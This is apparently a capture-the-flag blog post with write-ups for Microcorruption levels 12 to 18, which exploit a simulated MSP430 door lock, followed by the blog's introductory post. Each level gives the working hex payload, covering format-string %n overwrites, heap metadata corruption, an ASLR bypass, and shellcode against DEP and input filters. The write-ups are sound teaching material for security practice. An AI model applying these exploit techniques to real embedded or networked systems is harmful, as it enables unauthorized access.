Password (Hex encoded input): 616161614c446262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262

Type “reset”, “solve”, and enter the password.

Level 12: Novosibirsk

OVERVIEW

– This lock is attached the the LockIT Pro HSM-2.
– We have added features from b.03 to the new hardware.

DETAILS

The LockIT Pro c.02 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communiciate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessable from the exterior of the building.

This is Software Revision 02. We have improved the security of the
lock by ensuring passwords can not be too long.

Solution:

Break main and type “c”.

…

Notice the printf; there may be a format string vulnerability.

Break at 0x448e, which is a test:
break 448e
c
Input: aaaa
c

Notice that conditional_unlock_door pushes 0x7e to INT at 0x44c6

We want to overwrite it to 0x7f, so that INT 0x7f gets called instead
0x7f = 127

So we can do:
0x44c8 + 125 A’s + %n

The %n will overwrite the 0x7e with 0x7f (127)

Testing the format string theory:
reset
c
c
python -c “print ’44c8′ + ‘A’ * 125”

Input: 44c8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%n

Our exploit will look like: c844 + (125 A’s) + 256e

Testing our format string theory:
reset
c
c
Input (hex-encoded): c8446161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161256e

We have our solution and can now pass the challenge.

Username (Hex encoded input): c8446161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161256e

Type “reset”, “solve”, and enter the password.

Level 13: Algiers

OVERVIEW

– This lock contains the all-new LockIT Pro Account Manager.

DETAILS

The LockIT Pro d.01 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communiciate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessable from the exterior of the building.

LockIT Pro Account Manager solves the problem of sharing passwords
when multiple users must have access to a lock. The Account
Manager contains a mapping of users to PINs, each of which is 4
digits. The system supports hundreds of users, each configured
with his or her own PIN, without degrading the performance of the
manager.

There are no accounts set up on the LockIT Pro Account Manager by
default. An administrator must first initialize the lock with user
accounts and their PINs. User accounts are by default not
authorized for access, but can be authorized by attaching the
Account Manager Authorizer. This prevents users from adding
themselves to the lock during its use.

This is Hardware Version D. It contains the Bluetooth connector
built in, and one available port, to which the LockIT Pro Deadbolt
should be connected. When authorizing PINs, the Deadbolt should be
disconnected and the Authorizer should be attached in its place.

This is Software Revision 01. It is a much more advanced
version of other locks, but the first Version D release.

Solution:
Break main and type “c” two times.
user: aaaa
pass: bbbb
c

Notice that we have metadata headers before our input.

The header contains:
(1) Pointer to the previous block
(2) Pointer to the next block
(3) The size of the block
(4) Status of the block; whether it’s allocated or free

We have two blocks, each 16 bytes big, and they’re next to each other.
Also notice that there is no check on the length of input.
This means we can overwrite the header of the second block and make it point to wherever we want.

Notice that unlock_door is at 0x4564 and free’s ret address is right behind at 0x4562
This means we can use NOPs to slide into unlock_door.

The exploit will look like:
16 A’s + 4444 + 6245 + 0100

Generate the exploit with Python:
python -c “print ’61’ * 16 + ‘4444’+ ‘6245’ + ‘0100’”

Testing the theory:
reset
c
c
user (hex-encoded): 61616161616161616161616161616161444462450100
pass: <blank>
c
c

We have our solution and can now pass the challenge.

Username (Hex encoded input): 61616161616161616161616161616161444462450100

Type “reset”, “solve”, and enter the password.

Level 14: Vladivostok

OVERVIEW

– Lockitall developers further used the hardware randomization to
improve lock security.
– This lock is attached the the LockIT Pro HSM-2.

DETAILS

The LockIT Pro c.05 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communiciate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessable from the exterior of the building.

Despite the year of development effort which went in to it, we
have heard reports that the memory protection introduced in to
LockIT Pro r e.01 is insufficient. We have removed this feature in
favor of the tried-and-true HSM-2. The engineers responsible for
LockIT Pro r e.01 have been sacked.

This is Software Revision 05. We have implemented new state-of-
the-art techniques to prevent any futher lock issues.

Solution:
Break main and type “c”:

We see that ASLR is implemented.
Adress Space Layout Randomization is a protection mechanism that guards against buffer overflows by randomizing the location where executables are loaded in memory. What this means is that the addresses to overwrite will always vary.

We can also see printf at 0x476a, which might mean a format string vulnerability.
Also notice the INT at 0x48ec

Calculations for exploit development:
0x48ec – 0x476a = 0x182

Testing the format string theory:
c
Input: %x%x
c
c

The program is vulnerable to format string attacks.
Also notice how everything was overwritten.

The address of printf is 0x6c56

The password should be:
8 random bytes + (printf_addr + 0x182) + 2 random bytes + 7f00

Write a Python script to get us the password:

Run the script and test the exploit:
python vladivostok.py

Password (Hex encoded input): 4141414141414141d86d42427f00
c

We have our solution and can now pass the challenge.

Type “solve”.

Password (Hex encoded input): 41414141414141411e7942427f00

Level 15: Bangalore

OVERVIEW

– The lock uses the first MSP430 ever to have memory protection.
– This lock is attached the the LockIT Pro HSM-2.

DETAILS

The LockIT Pro contains a Bluetooth chip allowing it to
communiciate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessable from the exterior of the building.

Lockitall engineers have worked for over a year to bring memory
protection to the MSP430—a truly amazing achievement. Each of
the 256 pages can either be executable or writeable, but never
both, finally bringing to a close some of the issues in prior
versions.

This is Hardware Version C. It contains the all-new modified
MSP430 with hardware memory protection. This hardware version
also contains the Bluetooth connector built in, and two available
ports: the LockIT Pro Deadbolt should be connected to port 1, and
the LockIT Pro HSM-2 should be connected to port 2.

This is Software Revision 01. The new firmware supports the memory
protection we have introduced in this new hardware version.

Solution:
Break main and type “c”:

Notice this program has Data Execution Prevention (DEP) enabled.
Both the manual and the program shows that pages are either executable or writable.
0x1 makes the page writable and 0x0 makes the page executable.

Type “c” and use Python for input:
c
python -c “print ’61’ * 20”
Input (hex-encoded): 6161616161616161616161616161616161616161

Notice our input starts at 0x3fee

Reset.
reset
c
c
python -c “print ’61’ * 16 + ‘ee3f'”
Input (hex-encoded): 61616161616161616161616161616161ee3f
c

We get a segmentation fault, saying it cannot execute a write-only page.

We need to set the page where our input is to executable (0x44ba)
The format we will use is:
<shellcode><buffer><mark_page_executable><page num><executable mark><input addr>

This will mark our input page as executable and then execute our shellcode.

Go to the Assembler.
Assemble:
mov #0xff00, sr
call #0x10

Where 0xff00 is 0x8000 + 0x7f00

The assembled objects are: 324000ffb0121000

Use Python to calculate the password:
python -c “print ‘324000ffb0121000′ + ’61’ * 8 + ‘ba44’ + ‘3f00’ + ‘0000’ + ‘ee3f'”

Password (Hex encoded input): 324000ffb01210006161616161616161ba443f000000ee3f

Type “reset”, “solve”, and enter the password.

Level 16: Lagos

OVERVIEW

– Passwords may now only contain alphanumeric characters.
– This lock is attached the the LockIT Pro HSM-2.

DETAILS

The LockIT Pro c.04 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communiciate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessable from the exterior of the building.

This is Software Revision 04. Due to user confusion over which
characters passwords may contain, only alphanumeric passwords are
accepted.

Solution:
Note that this level only accepts alphanumeric characters, so we can only use: 0x30-0x39, 0x41-0x5a and 0x61-0x7a

Break main and type “c” twice:
Input: 111122223333

Notice we have a 200-byte space to play with, starting from 0x2400

Type “c”:
c

Notice our input starts at 0x43ed, and the return address is at 0x43fe

43fe – 43ed = 17

Our buffer will consist of 17 characters.

We want to call INT 0x7f in order to unlock the door.

Notice that 0x4654 in getsn is within our limited range and allows us to enter more input that is unconstrained.
We will return to 0x4654, specify the address to write to, the input size and the return address.

Use Python to make the calculations:
python -c “print ’41’ * 17 + ‘5446’ + ‘3044’ * 3”

Reset.
c
c
Input (hex-encoded): 41414141414141414141414141414141415446304430443044
c
Wait

Go to the Assembler.
Assemble:
push #0x7f
call #0x45fc

Assembled objects: 30127f00b012fc45

These assembled objects are how we issue the INT to bypass authentication.

Remember:

Back in the input prompt:
c
Input (hex-encoded): 30127f00b012fc45
c

We have our solution and can now pass the challenge.

Password (Hex encoded input): 41414141414141414141414141414141415446304430443044
Password (Hex encoded input): 30127f00b012fc45

Type “reset”, “solve”, and enter the password.

Level 17: Chernobyl

OVERVIEW

– This lock contains the all-new LockIT Pro Account Manager.

DETAILS

The LockIT Pro d.02 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communiciate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessable from the exterior of the building.

This is Software Revision 02. It contains the all-new
vault-manager software.

Solution:
Break main and type “c” twice:

Input: aaaa bbbb
c
Input: aaaa bbb

Step through the program:
s …
s …
s …
s …

Notice the stack pointer is just at the start of our name.

Continue stepping through the program.
s …
s …
s …
s …

Notice:
0x4ce6: jnz #0x4bbe <run+0x58>
0x4bbe is cmp.b #0x61, r15
0x61 = a

Continue stepping through the program.
s …
s …

Notice:
0x4bc2: jne #0x4c38 <run+0xd2>
0x4c38 is cmp.b #0x6e, r15
0x6e = n

Continue stepping through the program.
s …
s …
s …
s …
s …

Notice:
4bdc: mov.b @r11, r15

s …

Notice r15 now holds our first b

Continue stepping through the program.
s

The process repeats itself with the pin.

Pay attention to 49cc <get_from_table>. We will be stepping through and examining it.

Break at 49cc and step through it.
break 49cc
c
s …
s …
s …
s …
s …
s …
s …
s …
s …
s …

s …

The hash function gets called.

Notice also that further down, rehash calls both malloc and free.

As in the Algiers level, the key is to manipulate header metadata.
We need to set the backwards pointer (bk) as the destination address, and forward pointer (fd) as the return address.

Note that we can actually chain entries in the program by using “;”, similar to how we would perform command injections in other programs.

There is space for five entries per chain, and the sixth entry will overwrite.
Also important to note is that the new memory chunks are stored right after the last allocated chunk.

Craft a Python script to solve the challenge.

python chernobyl.py

Password (Hex encoded input): 6e6577203020313b6e6577203820313b6e6577204820313b6e6577205020313b6e657720ca3d0101feff3420313b6e657720ca3da250b9f48a505c51feff3020313b6e6577205820313b6e6577206820313b6e6577207020313b6e6577207820313b6e657720303020313b6e657720303820313b324000ff30401000

Type “reset”, “solve”, and enter the password.

Level 18: Hollywood

OVERVIEW

– New randomization improves code security.
– This lock is not attached to any hardware security module.
DETAILS

The LockIT Pro a.04 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communiciate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessable from the exterior of the building.

This is Hardware Version A. It contains the Bluetooth connector
built in, and one available port to which the LockIT Pro Deadbolt
should be connected.

This is Software Revision 04. Our developers have included a new
hardware random number generator, making it impossible to know
where the password will be. We apologize again for making it too
easy for the password to be recovered. Those responsible for
sacking the engineers who were previously sacked have been sacked.
Solution:

Everything is randomized, so we have to step through all of the program.

We get the following algorithm that deals with user input:

mov #2600 r5
clr r6
add @r5, r4
swpb r4
xor @r5+, r6
xor r4, r6
xor r6, r4
tst 0x0(r5)
mov sr, r7
and #0x2, r7
rra r7
xor #0x1, r7
swpb r7
rra r7
sxt r7
swpb r7
sxt r7
mov #0x4b18, r8
and r7 r8
and #0x47aa, r7
add r7, r8
clr r7
mov r8, r12
cmp #0xfeb1, r4
mov sr, r7
clr r4
cmp #0x9298, r6
and sr, r7
clr r6
rra r7
xor #0x1, r7
swpb r7
rra r7
rra r7
rra r7
rra r7
bis r7, sr
mov #0xff00, sr
call #0x10

We craft a script to generate the key:

Run the script:
ruby hollywood.rb

Password (Hex encoded input): 1220833eef6b

Type “reset”, “solve”, and enter the password.

— Microcorruption Finished —

Notes on the CTF: Very fun and educational challenges.The user interface looked great and with the inclusion of the assembler and the manual, you had all you needed to complete the challenges.

First blog post

About this blog – CTF and war game write-ups, exploits, code, and news.

This blog will consist of a series of write-ups of war games and capture the flag competitions I compete in and complete. I will also be posting about some of my exploits, what I’m working on with regards to cyber security, as well as important news.

My main interest is in embedded security. However, I compete and am interested in all aspects of network security. So, expect posts covering the whole cyber security gamut.

In the coming weeks I will be posting some of my complete write-ups, as well as work in progress.

Some of the war games I have completed include:

Over the Wire:

Bandit
Natas
Narnia
Behemoth

Enigma:

Basic
Realistic
Cryptography
Programming
Steganography

Hack This Site:

Basic
Realistic
Programming
Javascript
Forensic

I am currently working on:

Microcorruption (Embedded Security CTF)
Pwnable.kr

I will be participating with my CTF team in EkoParty 2016 and a few other CTF competitions later this year. So expect write-ups on these as well.